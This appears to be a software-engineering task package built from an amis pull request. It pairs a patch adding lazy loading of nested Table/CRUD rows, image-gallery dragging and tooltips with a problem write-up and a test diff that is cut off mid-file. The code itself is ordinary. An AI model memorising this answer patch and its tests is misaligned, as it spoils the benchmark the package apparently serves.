b/packages/amis-ui/scss/components/_image-gallery.scss index 54dfee091..ad4c2b075 100644 --- a/packages/amis-ui/scss/components/_image-gallery.scss +++ b/packages/amis-ui/scss/components/_image-gallery.scss @@ -54,13 +54,22 @@ justify-content: center; align-items: center; user-select: none; + overflow: hidden; > img { + cursor: move; + cursor: -webkit-grab; display: block; max-width: 100%; max-height: 100%; transition: transform 0.3s cubic-bezier(0, 0, 0.25, 1) 0s; } + + &.is-dragging > img { + transition: none; + user-select: none; + cursor: -webkit-grabbing; + } } &-prevBtn, @@ -216,6 +225,7 @@ .#{$ns}ImageGallery-toolbar { background-color: var(--image-images-preview-bgColor); border-radius: var(--image-images-preview-radius); + box-shadow: 0 2px 6px 0 rgba(211, 211, 211, 0.5); display: flex; align-items: flex-start; padding: var(--image-images-preview-paddingTop) diff --git a/packages/amis-ui/scss/components/_table.scss b/packages/amis-ui/scss/components/_table.scss index b0976d487..d93fd7ab9 100644 --- a/packages/amis-ui/scss/components/_table.scss +++ b/packages/amis-ui/scss/components/_table.scss @@ -620,6 +620,10 @@ > thead > tr > th.#{$ns}Table-primayCell, > tbody > tr > td.#{$ns}Table-primayCell { white-space: nowrap; // 树形表格展示标题栏,不要换行 + + > .#{$ns}Spinner { + vertical-align: middle; + } } } @@ -864,6 +868,14 @@ } } + &-retryBtn { + color: var(--Form-feedBack-color); + cursor: pointer; + &:hover { + color: var(--Form-feedBack-color); + } + } + &-expandBtn, &-expandBtn2 { position: relative; diff --git a/packages/amis-ui/scss/components/form/_tree.scss b/packages/amis-ui/scss/components/form/_tree.scss index 397dc5d1e..7f6feee9f 100644 --- a/packages/amis-ui/scss/components/form/_tree.scss +++ b/packages/amis-ui/scss/components/form/_tree.scss @@ -199,6 +199,7 @@ height: var(--Tree-itemHeight); line-height: var(--Tree-itemHeight); padding-right: var(--Tree-icon-gap); + flex-shrink: 0; > a { display: inline-block; @@ -359,7 +360,6 @@ &-itemText { cursor: pointer; - flex: 1 auto; display: inline-block; color: var(--inputTree-base-default-color); font-size: var(--select-tree-fontSize); diff --git a/packages/amis-ui/src/components/ImageGallery.tsx b/packages/amis-ui/src/components/ImageGallery.tsx index 9500ede08..1dda61f62 100644 --- a/packages/amis-ui/src/components/ImageGallery.tsx +++ b/packages/amis-ui/src/components/ImageGallery.tsx @@ -49,6 +49,14 @@ export interface ImageGalleryState { scale: number; /** 图片旋转角度 */ rotate: number; + /** + * 水平位移 + */ + tx: number; + /** + * 垂直位移 + */ + ty: number; /** 是否开启操作栏 */ showToolbar?: boolean; /** 是否显示底部图片集 */ @@ -89,6 +97,8 @@ export class ImageGallery extends React.Component< isOpened: false, index: -1, items: [], + tx: 0, + ty: 0, scale: 1, rotate: 0, showToolbar: false, @@ -103,8 +113,10 @@ export class ImageGallery extends React.Component< ref.addEventListener('wheel', this.onWheelScroll, { passive: false }); + ref.addEventListener('mousedown', this.onMouseDown); } else { this.galleryMain?.removeEventListener('wheel', this.onWheelScroll); + this.galleryMain?.removeEventListener('mousedown', this.onMouseDown); } this.galleryMain = ref; @@ -128,6 +140,38 @@ export class ImageGallery extends React.Component< } } + startX = 0; + startY = 0; + startTx = 0; + startTy = 0; + + @autobind + onMouseDown(event: MouseEvent) { + this.galleryMain?.classList.add('is-dragging'); + document.body.addEventListener('mousemove', this.onMouseMove); + document.body.addEventListener('mouseup', this.onMouseUp); + + this.startX = event.clientX; + this.startY = event.clientY; + this.startTx = this.state.tx; + this.startTy = this.state.ty; + } + + @autobind + onMouseMove(event: MouseEvent) { + this.setState({ + tx: this.startTx + event.clientX - this.startX, + ty: this.startTy + event.clientY - this.startY + }); + } + + @autobind + onMouseUp() { + this.galleryMain?.classList.remove('is-dragging'); + document.body.removeEventListener('mousemove', this.onMouseMove); + document.body.removeEventListener('mouseup', this.onMouseUp); + } + @autobind handleImageEnlarge(info: { src: string; @@ -151,6 +195,10 @@ export class ImageGallery extends React.Component< this.setState({ isOpened: true, + tx: 0, + ty: 0, + rotate: 0, + scale: 1, items: info.list ? info.list : [info], index: info.index || 0, /* children组件可以控制工具栏的展示 */ @@ -207,23 +255,35 @@ export class ImageGallery extends React.Component< switch (action.key) { case ImageActionKey.ROTATE_LEFT: - this.setState(prevState => ({rotate: prevState.rotate - 90})); + this.setState(prevState => ({ + rotate: prevState.rotate - 90, + tx: 0, + ty: 0 + })); break; case ImageActionKey.ROTATE_RIGHT: - this.setState(prevState => ({rotate: prevState.rotate + 90})); + this.setState(prevState => ({ + rotate: prevState.rotate + 90, + tx: 0, + ty: 0 + })); break; case ImageActionKey.ZOOM_IN: - this.setState(prevState => ({scale: prevState.scale + 0.5})); + this.setState(prevState => ({ + scale: prevState.scale + 0.5, + tx: 0, + ty: 0 + })); break; case ImageActionKey.ZOOM_OUT: this.setState(prevState => { return prevState.scale - 0.5 > 0 - ? {scale: prevState.scale - 0.5} + ? {scale: prevState.scale - 0.5, tx: 0, ty: 0} : null; }); break; case ImageActionKey.SCALE_ORIGIN: - this.setState(() => ({scale: 1})); + this.setState(() => ({scale: 1, tx: 0, ty: 0})); break; } @@ -280,6 +340,8 @@ export class ImageGallery extends React.Component< items, rotate, scale, + tx, + ty, showToolbar, enlargeWithGallary, actions, @@ -320,8 +382,11 @@ export class ImageGallery extends React.Component< ref={this.galleryMainRef} > <img + draggable={false} src={items[index].originalSrc} - style={{transform: `scale(${scale}) rotate(${rotate}deg)`}} + style={{ + transform: `translate(${tx}px, ${ty}px) scale(${scale}) rotate(${rotate}deg)` + }} /> {showToolbar && Array.isArray(actions) && actions.length > 0 diff --git a/packages/amis-ui/src/components/Tree.tsx b/packages/amis-ui/src/components/Tree.tsx index 5766cbf71..047bf6c93 100644 --- a/packages/amis-ui/src/components/Tree.tsx +++ b/packages/amis-ui/src/components/Tree.tsx @@ -37,6 +37,7 @@ import {LocaleProps, localeable} from 'amis-core'; import Spinner, {SpinnerExtraProps} from './Spinner'; import {ItemRenderStates} from './Selection'; import VirtualList from './virtual-list'; +import TooltipWrapper from './TooltipWrapper'; interface IDropIndicator { left: number; @@ -1275,33 +1276,42 @@ export class TreeSelector extends React.Component< !(item.defer && !item.loaded) ? ( <div className={cx('Tree-item-icons')}> {creatable && hasAbility(item, 'creatable') ? ( - <a - onClick={this.handleAdd.bind(this, item)} - data-tooltip={__(createTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(createTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="plus" className="icon" /> - </a> + <a onClick={this.handleAdd.bind(this, item)}> + <Icon icon="plus" className="icon" /> + </a> + </TooltipWrapper> ) : null} {removable && hasAbility(item, 'removable') ? ( - <a - onClick={this.handleRemove.bind(this, item)} - data-tooltip={__(removeTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(removeTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="minus" className="icon" /> - </a> + <a onClick={this.handleRemove.bind(this, item)}> + <Icon icon="minus" className="icon" /> + </a> + </TooltipWrapper> ) : null} {editable && hasAbility(item, 'editable') ? ( - <a - onClick={this.handleEdit.bind(this, item)} - data-tooltip={__(editTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(editTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="new-edit" className="icon" /> - </a> + <a onClick={this.handleEdit.bind(this, item)}> + <Icon icon="new-edit" className="icon" /> + </a> + </TooltipWrapper> ) : null} </div> ) : null} diff --git a/packages/amis-ui/src/locale/de-DE.ts b/packages/amis-ui/src/locale/de-DE.ts index 2e687fabe..0d685fb5a 100644 --- a/packages/amis-ui/src/locale/de-DE.ts +++ b/packages/amis-ui/src/locale/de-DE.ts @@ -197,6 +197,8 @@ register('de-DE', { 'Options.editLabel': 'Bearbeiten {{label}}', 'Options.label': 'Option', 'Options.createFailed': 'Erstellen fehlgeschlagen', + 'Options.retry': + "Laden fehlgeschlagen '{{reason}}', klicken Sie auf Wiederholen", 'placeholder.empty': '<Empty>', 'placeholder.enter': 'Eingabe', 'placeholder.noData': 'Keine Daten', diff --git a/packages/amis-ui/src/locale/en-US.ts b/packages/amis-ui/src/locale/en-US.ts index 605c4884f..481361a3b 100644 --- a/packages/amis-ui/src/locale/en-US.ts +++ b/packages/amis-ui/src/locale/en-US.ts @@ -189,6 +189,7 @@ register('en-US', { 'Options.editLabel': 'Edit {{label}}', 'Options.label': 'option', 'Options.createFailed': 'create failed, please check', + 'Options.retry': "Loading failed '{{reason}}', click retry", 'placeholder.empty': '<Empty>', 'placeholder.enter': 'Enter', 'placeholder.noData': 'No data', diff --git a/packages/amis-ui/src/locale/zh-CN.ts b/packages/amis-ui/src/locale/zh-CN.ts index ccea50181..95e19b697 100644 --- a/packages/amis-ui/src/locale/zh-CN.ts +++ b/packages/amis-ui/src/locale/zh-CN.ts @@ -194,6 +194,7 @@ register('zh-CN', { 'Options.editLabel': '编辑{{label}}', 'Options.label': '选项', 'Options.createFailed': '新增失败,请仔细检查', + 'Options.retry': '加载失败「{{reason}}」,点击重试', 'placeholder.empty': '<空>', 'placeholder.enter': '请输入', 'placeholder.noData': '暂无数据', diff --git a/packages/amis/src/renderers/CRUD.tsx b/packages/amis/src/renderers/CRUD.tsx index d453d176b..a140cf8d3 100644 --- a/packages/amis/src/renderers/CRUD.tsx +++ b/packages/amis/src/renderers/CRUD.tsx @@ -132,6 +132,11 @@ export interface CRUDCommonSchema extends BaseSchema, SpinnerExtraProps { */ api?: SchemaApi; + /** + * 懒加载 API,当行数据中用 defer: true 标记了,则其孩子节点将会用这个 API 来拉取数据。 + */ + deferApi?: SchemaApi; + /** * 批量操作 */ diff --git a/packages/amis/src/renderers/Table/Cell.tsx b/packages/amis/src/renderers/Table/Cell.tsx index 293974224..9da470971 100644 --- a/packages/amis/src/renderers/Table/Cell.tsx +++ b/packages/amis/src/renderers/Table/Cell.tsx @@ -9,7 +9,7 @@ import { buildTrackExpression, evalTrackExpression } from 'amis-core'; -import {BadgeObject, Checkbox, Icon} from 'amis-ui'; +import {BadgeObject, Checkbox, Icon, Spinner} from 'amis-ui'; import React from 'react'; export interface CellProps extends ThemeProps { @@ -32,6 +32,7 @@ export interface CellProps extends ThemeProps { popOverContainer?: any; quickEditFormRef: any; onImageEnlarge?: any; + translate: (key: string, ...args: Array<any>) => string; } export default function Cell({ @@ -51,7 +52,8 @@ export default function Cell({ onDragStart, popOverContainer, quickEditFormRef, - onImageEnlarge + onImageEnlarge, + translate: __ }: CellProps) { if (column.name && item.rowSpans[column.name] === 0) { return null; @@ -134,7 +136,18 @@ export default function Cell({ /> ); prefix.push( - item.expandable ? ( + item.loading ? ( + <Spinner key="loading" size="sm" show /> + ) : item.error ? ( + <a + className={cx('Table-retryBtn')} + key="retryBtn" + onClick={item.resetDefered} + data-tooltip={__('Options.retry', {reason: item.error})} + > + <Icon icon="retry" className="icon" /> + </a> + ) : item.expandable ? ( <a key="expandBtn2" className={cx('Table-expandBtn2', item.expanded ? 'is-active' : '')} @@ -169,7 +182,13 @@ export default function Cell({ ); } return [prefix, affix, addtionalClassName]; - }, [item.expandable, item.expanded, column.isPrimary]); + }, [ + item.expandable, + item.expanded, + item.error, + item.loading, + column.isPrimary + ]); // 根据条件缓存 data,避免孩子重复渲染 const hasCustomTrackExpression = diff --git a/packages/amis/src/renderers/Table/TableRow.tsx b/packages/amis/src/renderers/Table/TableRow.tsx index 388dc063e..83434f74c 100644 --- a/packages/amis/src/renderers/Table/TableRow.tsx +++ b/packages/amis/src/renderers/Table/TableRow.tsx @@ -60,6 +60,8 @@ export class TableRow extends React.PureComponent< depth: number; expandable: boolean; appeard?: boolean; + loading?: boolean; + error?: string; checkdisable: boolean; trRef?: React.Ref<any>; isNested?: boolean; @@ -362,6 +364,8 @@ export default observer((props: TableRowProps) => { depth={item.depth} expandable={item.expandable} checkdisable={item.checkdisable} + loading={item.loading} + error={item.error} // data 在 TableRow 里面没有使用,这里写上是为了当列数据变化的时候 TableRow 重新渲染, // 不是 item.locals 的原因是 item.locals 会变化多次,比如父级上下文变化也会进来,但是 item.data 只会变化一次。 data={canAccessSuperData ? item.locals : item.data} diff --git a/packages/amis/src/renderers/Table/index.tsx b/packages/amis/src/renderers/Table/index.tsx index 59f43d2d6..cee5ca66d 100644 --- a/packages/amis/src/renderers/Table/index.tsx +++ b/packages/amis/src/renderers/Table/index.tsx @@ -7,7 +7,8 @@ import { SchemaExpression, position, animation, - evalExpressionWithConditionBuilder + evalExpressionWithConditionBuilder, + isEffectiveApi } from 'amis-core'; import {Renderer, RendererProps} from 'amis-core'; import {SchemaNode, ActionObject, Schema} from 'amis-core'; @@ -71,6 +72,7 @@ import ColGroup from './ColGroup'; import debounce from 'lodash/debounce'; import AutoFilterForm from './AutoFilterForm'; import Cell from './Cell'; +import {reaction} from 'mobx'; /** * 表格列,不指定类型时默认为文本类型。 @@ -343,6 +345,11 @@ export interface TableSchema extends BaseSchema { * table layout */ tableLayout?: 'fixed' | 'auto'; + + /** + * 懒加载 API,当行数据中用 defer: true 标记了,则其孩子节点将会用这个 API 来拉取数据。 + */ + deferApi?: SchemaApi; } export interface TableProps extends RendererProps, SpinnerExtraProps { @@ -640,6 +647,18 @@ export default class Table extends React.Component<TableProps, object> { formItem && isAlive(formItem) && formItem.setSubStore(store); Table.syncRows(store, this.props, undefined) && this.syncSelected(); + + this.toDispose.push( + reaction( + () => + store + .getExpandedRows() + .filter( + row => row.defer && !row.loaded && !row.loading && !row.error + ), + (rows: Array<IRow>) => rows.forEach(this.loadDeferredRow) + ) + ); } static syncRows( @@ -711,6 +730,34 @@ export default class Table extends React.Component<TableProps, object> { } } + @autobind + async loadDeferredRow(row: IRow) { + const {env} = this.props; + const deferApi = row.data.deferApi || this.props.deferApi; + + if (!isEffectiveApi(deferApi)) { + throw new Error('deferApi is required'); + } + + try { + row.markLoading(true); + + const response = await env.fetcher(deferApi, row.locals); + if (!response.ok) { + throw new Error(response.msg); + } + + row.setDeferData(response.data); + row.markLoaded(true); + row.setError(''); + } catch (e) { + row.setError(e.message); + env.notify('error', e.message); + } finally { + row.markLoading(false); + } + } + /** * 自动设置表格高度占满界面剩余区域 * 用 css 实现有点麻烦,要改很多结构,所以先用 dom hack 了,避免对之前的功能有影响 @@ -2024,7 +2071,8 @@ export default class Table extends React.Component<TableProps, object> { checkOnItemClick, popOverContainer, canAccessSuperData, - itemBadge + itemBadge, + translate } = this.props; return ( @@ -2047,6 +2095,7 @@ export default class Table extends React.Component<TableProps, object> { popOverContainer={this.getPopOverContainer} quickEditFormRef={this.subFormRef} onImageEnlarge={this.handleImageEnlarge} + translate={translate} /> ); }
feat: CRUD & Table 嵌套支持懒加载 Close: #8411 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 8d09692</samp> This pull request adds a new feature to the `Table` and `CRUD` components that allows loading nested data lazily using the `deferApi` property. It also improves the appearance and usability of the components when loading data asynchronously, and adds localization support for the retry button tooltip. It updates the documentation and examples to reflect the new feature and fixes some minor formatting issues. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 8d09692</samp> > _Sing, O Muse, of the mighty `Table` component, the pride of `amis-ui`,_ > _Which can load nested data with lazy grace, using the `deferApi` property._ > _Like the Hydra, whose heads sprang forth anew when severed by Heracles,_ > _So the `Table` expands its rows with spinners and buttons, fetching data from sources._ ### Why Close: #8411 ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 8d09692</samp> * Add nested and lazy loading feature for CRUD and Table components ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-95eedf8e35f124d56f35a016c1df591c4070cb9aff56cfefc58b33512de87653R586-R640), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-c1e292113137100e48b28863e77748e5f3bc137887515cbc8bc714c855ca982dL5-R7), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cR42-R80), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL130-R169), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cR176-R179), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cR185-R195), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL323-R403), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cR409-R438), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL1324-R1365), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL1345-R1381), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-8fb8c997f3ff51bc659043405077ecb4d0707fcd69ab31bd7cdcb5eeb5c0bd56R136-R140), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-d65258ae6673eb54481e932fd39b426fb60a31ca9cb7430d0cff54fe035efe15L12-R12), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-d65258ae6673eb54481e932fd39b426fb60a31ca9cb7430d0cff54fe035efe15L137-R151), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-a8b4227510cc7dd856d8854c10b9d18799441b0a9ee0733efd30d7ede190844aL10-R11), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-a8b4227510cc7dd856d8854c10b9d18799441b0a9ee0733efd30d7ede190844aR75), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-a8b4227510cc7dd856d8854c10b9d18799441b0a9ee0733efd30d7ede190844aR348-R352), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-a8b4227510cc7dd856d8854c10b9d18799441b0a9ee0733efd30d7ede190844aR650-R661), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-a8b4227510cc7dd856d8854c10b9d18799441b0a9ee0733efd30d7ede190844aR733-R760), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-43b60bad2b0604663fde07452d82b7576c0d07c3fea6c0a0d6d24a1dd3b82f49R63-R64), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-43b60bad2b0604663fde07452d82b7576c0d07c3fea6c0a0d6d24a1dd3b82f49R367-R368)) * Document the new `deferApi` property for CRUD and Table components in `docs/zh-CN/components/crud.md` and `docs/zh-CN/components/table.md` files ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-95eedf8e35f124d56f35a016c1df591c4070cb9aff56cfefc58b33512de87653R3230), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-8a30381c7717a1ae36bd67d653324e6d01991200c0a2f1a0124f1e753d0cf380R1828)) * Add style rules for the spinner and the retry button for deferred data loading in `packages/amis-ui/scss/components/_table.scss` file ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-86a8277e8494106d5e5c532d4d8710b1e5b8c84234089da23e1a35e366e6686dR623-R626), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-86a8277e8494106d5e5c532d4d8710b1e5b8c84234089da23e1a35e366e6686dR871-R878)) * Add translation keys and values for the retry button tooltip in locale files ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-7c7473c7eeac8c306a9c1dbf7f116bf87b1bcd4c31e9e0f8c619febc67faf8a5R200-R201), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-fb22f243566a7ed671bc6279e3cc6f0a1eddc2fe4259d84b4cb8a7f596987e49R192), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-2fd35dabf975bb2b4ad936c4efcf03b6ce58a0954eba2964acffa8e557091e64R197)) * Remove unused properties and variables from the `Row` and `TableStore` models in `packages/amis-core/src/store/table.ts` file ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL130-R169), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL1301), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL1318)) * Extract common logic for initializing children rows to a separate function in `packages/amis-core/src/store/table.ts` file ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cR42-R80), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL323-R403), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL1241-L1289)) * Modify the logic of loading a js file as a mock data source in `mock/cfc/mock/index.js` file to support a `cache` property ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-c8f6c51e62dacca1b086e6a770c78f883aa9076d82fde1a7bc8da447dc2491edL30-R43)) * Add spaces around the word `Query` in `docs/zh-CN/components/crud.md` file ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-95eedf8e35f124d56f35a016c1df591c4070cb9aff56cfefc58b33512de87653L203-R207)) * Remove an empty line in `docs/zh-CN/components/crud.md` file ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-95eedf8e35f124d56f35a016c1df591c4070cb9aff56cfefc58b33512de87653L216)) * Add the `translate` property to the `CellProps` interface and the `Cell` and `TableRow` components in `packages/amis/src/renderers/Table/Cell.tsx` and `packages/amis/src/renderers/Table/TableRow.tsx` files, and pass the translation function from the parent component ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-d65258ae6673eb54481e932fd39b426fb60a31ca9cb7430d0cff54fe035efe15R35), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-d65258ae6673eb54481e932fd39b426fb60a31ca9cb7430d0cff54fe035efe15L54-R56), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-d65258ae6673eb54481e932fd39b426fb60a31ca9cb7430d0cff54fe035efe15L172-R191), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-a8b4227510cc7dd856d8854c10b9d18799441b0a9ee0733efd30d7ede190844aL2027-R2075), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-a8b4227510cc7dd856d8854c10b9d18799441b0a9ee0733efd30d7ede190844aR2098), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-43b60bad2b0604663fde07452d82b7576c0d07c3fea6c0a0d6d24a1dd3b82f49R63-R64), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-43b60bad2b0604663fde07452d82b7576c0d07c3fea6c0a0d6d24a1dd3b82f49R367-R368))
**Title** Add lazy‑load support for nested data in Table/CRUD and related UI improvements **Problem** Large hierarchical datasets cause performance issues because Table and CRUD always load all child rows eagerly. There was also no visual feedback or retry mechanism when loading such data fails, and the text‑replacement utility lacked a flexible way to specify ignored keys. **Root Cause** The table store treated all rows as fully materialized and lacked a flag to indicate deferred loading, so expanding a node could not trigger an on‑demand request. UI components did not expose loading or error states, and the replace‑text implementation only accepted a static array of keys. **Fix / Expected Behavior** - Introduce a `deferApi` option and a `defer` flag on rows to enable on‑expand lazy loading of children. - Show a spinner while deferred data is being fetched and a retry button with localized tooltip when loading fails. - Provide a method to reset and reload deferred rows after a retry. - Extend the replace‑text API to accept a function for dynamic ignore‑key logic. - Pass request context to API adaptors and improve filter detection in the formula lexer. - Add drag‑to‑move capability to the image gallery preview. - Wrap tree action icons with tooltip components for consistent hover hints. - Update documentation, examples, and localization keys to reflect the new feature. **Risk & Validation** - Verify that existing tables without `deferApi` continue to work unchanged. - Test lazy loading, spinner, and retry flow with large nested datasets to ensure correct data rendering and error handling. - Confirm that replace‑text still behaves correctly when using both array and function ignore specifications. - Run UI tests for image gallery dragging and tree icon tooltips to ensure no regressions.
8,517
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index fb30171c4..32d23b1e5 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -580,3 +580,9 @@ test('evalute:namespace', () => { expect(evaluate('${ls: &["c"]["c"]}', {})).toMatchObject({d: 4}); expect(evaluate('${ls: &["c"][key]}', {})).toMatchObject({d: 4}); }); + +test('evalute:speical characters', () => { + // 优先识别成位运算,而不是过滤器 + expect(evaluate('${1 | 2}', {})).toBe(3); + expect(evaluate('${1 | abc}', {abc: 2})).toBe(3); +}); diff --git a/packages/amis-formula/__tests__/lexer.test.ts b/packages/amis-formula/__tests__/lexer.test.ts index 773032b1d..e431f3d24 100644 --- a/packages/amis-formula/__tests__/lexer.test.ts +++ b/packages/amis-formula/__tests__/lexer.test.ts @@ -31,13 +31,19 @@ test('lexer:simple', () => { test('lexer:filter', () => { expect( getTokens('\\$abc is ${abc | date: YYYY-MM-DD HH\\:mm\\:ss}', { - evalMode: false + evalMode: false, + filters: { + date() {} + } }) ).toMatchSnapshot(); expect( getTokens('\\$abc is ${abc | isTrue : trueValue : falseValue}', { - evalMode: false + evalMode: false, + filters: { + isTrue() {} + } }) ).toMatchSnapshot(); }); @@ -55,7 +61,10 @@ test('lexer:exception', () => { expect(() => getTokens('${a | filter: \\x2}', { - evalMode: false + evalMode: false, + filters: { + filter() {} + } }) ).toThrow('Unexpected token x in 1:17'); }); diff --git a/packages/amis-formula/__tests__/parser.test.ts b/packages/amis-formula/__tests__/parser.test.ts index fa87d1fbb..4c618fa1f 100644 --- a/packages/amis-formula/__tests__/parser.test.ts +++ b/packages/amis-formula/__tests__/parser.test.ts @@ -1,3 +1,4 @@ +import moment from 'moment'; import {parse} from '../src/index'; test('parser:simple', () => { @@ -120,8 +121,12 @@ test('parser:filter', () => { test('parser:filter-escape', () => { expect( parse('\\$abc is ${abc | date: YYYY-MM-DD HH\\:mm\\:ss}', { - evalMode: false - }) + evalMode: false, + filters: { + date: (input: any, format = 'LLL', inputFormat = 'X') => + moment(input, inputFormat).format(format) + } + } as any) ).toMatchSnapshot(); }); diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap index b8200254f..c290dc232 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap @@ -100,6 +100,9 @@ exports[`Renderer:Form 2`] = ` "onSuccess": [Function], "successMessage": "saveSuccess", }, + "context": { + "a": "123", + }, "data": { "a": "123", }, diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap index 17485c66e..f26ffe567 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap @@ -204,6 +204,9 @@ exports[`Form:initData:remote 2`] = ` "onSuccess": [Function], "successMessage": undefined, }, + "context": { + "c": "123", + }, "method": "get", "query": { "c": "123", diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap index d87b14148..84cec19c7 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap @@ -2061,10 +2061,7 @@ exports[`Renderer:transfer follow left mode 1`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2100,10 +2097,7 @@ exports[`Renderer:transfer follow left mode 1`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2725,10 +2719,7 @@ exports[`Renderer:transfer follow left mode 2`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2764,10 +2755,7 @@ exports[`Renderer:transfer follow left mode 2`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" diff --git a/packages/amis/__tests__/renderers/Image.test.tsx b/packages/amis/__tests__/renderers/Image.test.tsx index 61389eec5..45192f014 100644 --- a/packages/amis/__tests__/renderers/Image.test.tsx +++ b/packages/amis/__tests__/renderers/Image.test.tsx @@ -216,12 +216,12 @@ describe('Renderer:image', () => { const imgIns = 